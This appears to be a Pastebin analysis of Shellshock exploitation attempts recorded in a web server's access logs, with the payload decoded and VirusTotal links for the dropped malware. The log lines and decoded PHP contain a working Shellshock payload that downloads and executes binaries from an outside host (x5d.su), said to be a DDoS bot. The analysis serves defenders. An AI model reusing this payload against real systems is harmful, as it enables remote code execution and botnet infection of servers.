Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- Example of shellshock exploitation trying to download a DDoS tool "Linux/Tsunami" from x5d.su (146.155.13.42, Pontificia Universidad Catolica de Chile, although TLD .su is "Soviet Union" ¿?):
- */
- [...]
- 188.165.247.42 - - [12/Apr/2015:23:40:37 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 31300 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
- 188.165.247.42 - - [12/Apr/2015:23:40:39 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 31301 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
- 188.165.247.42 - - [12/Apr/2015:23:40:40 +0200] "GET /cgi-mod/index.cgi HTTP/1.0" 404 31292 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
- 188.165.247.42 - - [12/Apr/2015:23:40:40 +0200] "GET /cgi-bin/test.cgi HTTP/1.0" 404 31292 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
- 188.165.247.42 - - [12/Apr/2015:23:40:41 +0200] "GET /cgi-bin-sdb/printenv HTTP/1.0" 404 31295 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
- 91.217.90.49 - - [12/Apr/2015:23:41:35 +0200] "GET /rom-0 HTTP/1.0" 404 31275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
- 27.145.148.119 - - [12/Apr/2015:23:43:47 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 31300 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
- 27.145.148.119 - - [12/Apr/2015:23:43:51 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 31300 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
- 202.29.238.196 - - [12/Apr/2015:23:43:52 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 31299 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
- 202.29.238.196 - - [12/Apr/2015:23:43:53 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 31301 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
- [...]
- --------------
- /*
- Decoded script is:
- */
- $a = "http://x5d.su/s/susu1";
- $b = "http://x5d.su/s/susu2";
- $c = sys_get_temp_dir();
- $d = "susu1";
- $e = "susu2";
- $f = "chmod 777";
- $g = "file_put_contents";
- $h = "system";
- $i = "file_exists";
- $j = "fopen";
- if ($i($c . "/$d")){
- exit(1);
- }else{
- echo($c);
- $g("$c/$d", $j("$a", "r"));
- $g("$c/$e", $j("$b", "r"));
- $h("$f " . $c ."/$d");
- $h("$f " . $c ."/$e");
- $h($c . "/$d");
- $h($c . "/$e");
- }
- ----------------------
- /*
- Translated script is:
- */
- if (file_exists(sys_get_temp_dir() . "/"susu1"")){
- exit(1);
- }else{
- echo(sys_get_temp_dir());
- file_put_contents("sys_get_temp_dir()/susu1", fopen("http://x5d.su/s/susu1", "r"));
- file_put_contents("sys_get_temp_dir()/susu2", fopen("http://x5d.su/s/susu2", "r"));
- system("chmod 777 " . sys_get_temp_dir() ."/susu1");
- system("chmod 777 " . sys_get_temp_dir() ."/susu2");
- system(sys_get_temp_dir() . "/susu1");
- system(sys_get_temp_dir() . "/susu2");
- }
- Links to Virustotal:
- https://www.virustotal.com/en/file/3a4f90405832615a5dbe59c64e6de50c2a1a3e9b372a8605daf60960d4bef016/analysis/ (x64) 64b version
- https://www.virustotal.com/en/file/5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af/analysis/ (i386) 32b version
Add Comment
Please, Sign In to add comment